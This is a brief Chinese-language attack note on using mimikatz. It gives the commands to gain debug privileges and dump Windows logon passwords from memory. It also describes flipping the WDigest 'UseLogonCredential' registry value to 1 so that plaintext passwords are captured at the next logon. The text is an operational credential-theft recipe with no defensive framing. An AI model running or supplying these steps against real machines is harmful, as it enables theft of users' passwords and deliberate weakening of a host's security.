mimikatz.exe
privilege::debug
sekurlsa::logonpasswords full
2.0版本
第一条:privilege::debug
//提升权限
第二条:sekurlsa::logonpasswords
//抓取密码
默认配置是抓不到明文密码了,神器mimikatz显示Password为null
需要HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest的"UseLogonCredential"设置为1,类型为DWORD 32才可以,然后下次用户再登录,就能记录到明文密码了。